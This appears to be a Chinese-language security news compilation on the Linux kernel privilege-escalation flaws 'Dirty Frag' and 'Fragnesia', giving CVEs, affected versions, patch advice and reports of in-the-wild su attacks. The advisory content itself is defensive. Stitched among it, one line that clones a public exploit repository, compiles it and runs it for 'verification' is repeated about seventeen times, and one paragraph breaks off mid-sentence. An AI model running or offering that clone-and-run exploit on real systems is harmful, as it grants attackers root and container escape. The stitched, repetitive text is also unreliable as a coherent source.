【安全快讯】Linux内核近期两大高危漏洞:Dirty Frag与Fragnesia 一、Dirty Frag(CVE-2026-43284/CVE-2026-43500) 漏洞类型 :本地权限提升(LPE)+ 写任意位置(Write-what-where) CVSS评分 : 7.8分(高危) 发现时间 :2026年5月7日 影响范围 :Linux内核4.11.0(2017年发布)至6.8.7版本,几乎覆盖所有主流Linux发行版(Ubuntu、RHEL、CentOS、Fedora等)及容器环境 漏洞核心 这是一对可链式利用的漏洞组合,存在于内核网络子系统: CVE-2026-43284:通过 splice() 系统调用将只读页缓存页注入网络数据包片段槽位 CVE-2026-43500:RxRPC子系统权限检查缺陷,辅助完成提权 攻击者利用这两个漏洞可 将普通用户权限提升至root ,并实现容器逃逸。公开PoC已发布,且已监测到在野攻击。 修复建议 升级内核至5.15.206、6.1.87、6.6.27、6.8.8或更高版本 启用内核地址空间布局随机化(ASLR)等安全机制降低利用成功率 二、Fragnesia(CVE-2026-46300) 漏洞类型 :本地权限提升(LPE) 发现时间 :2026年5月13日 影响范围 :Linux内核XFRM ESP-in-TCP子系统,受Dirty Frag影响且未安装5月13日补丁的系统均可能受影响 漏洞核心 该漏洞允许无特权本地攻击者向只读文件(包括 /usr/bin/su 等setuid二进制文件)的内核页缓存写入任意字节,无需修改实际文件内容。通过篡改内核缓存中的程序逻辑,攻击者可欺骗系统授予root权限。 修复建议 立即安装5月13日发布的内核安全补丁 临时缓解:限制非特权用户访问网络子系统,或禁用ESP-in-TCP功能 风险提示 这两个漏洞均为本地提权漏洞, 无需管理员权限即可利用 ,对服务器和容器环境构成严重威胁。建议立即检查系统并应用安全更新,避免遭受攻击。 1 个帖子 - 1 位参与者 阅读完整话题
IT之家 5 月 13 日消息,安全研究人员 Hyunwoo Kim 此前 发现一项名为“Dirty Frag”的 Linux 内核漏洞 。该漏洞属于本地权限提升(LPE)漏洞,允许黑客借助低权限账号直接获取 root 权限。该漏洞于 4 月 30 日向 Linux 内核团队报告,但一名“无关第三方”打破了披露禁令,导致漏洞在补丁尚未准备就绪时被公开。 对此,微软安全博客发文,提示研究人员近期已观察到有多名黑客利用了 Dirty Frag 漏洞进行 su 提权攻击。 参考微软监测,相应黑客建立外部 SSH 连接生成交互式 Shell,随后执行 ELF 二进制文件,再通过 su 命令完成提权。 在成功获取高权限后,黑客会篡改与 GLPI LDAP 身份认证相关的特定文件,并进一步对 GLPI 与系统配置展开侦察,之后便会尝试窃取受害者敏感数据,并擦去会话内容中的敏感信息。 微软警告,“Dirty Frag”利用方式与今年 4 月底曝光的 Copy Fail(CVE-2026-31431)存在相似之处,均通过操控 Linux 页缓存(Page Cache)机制实现提权,但 Dirty Frag 提供了更多攻击路径,因此在漏洞利用成功率与稳定性方面可能比 Copy Fail 更高,这也意味着安全风险进一步升级。
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
还记得前几天的漏洞么:Copy Fail:2017年至今的漏洞,一个脚本获得 Linux root 管理员权限|CVE-2026-31431没想到,又来了。 Dirty Frag 这次叫 Dirty Frag,暂时还未获得 CVE 编号。普通用户可以在大多数 Linux 机器上立即获得 root 访
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
https://dirtyfrag.io 验证 git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp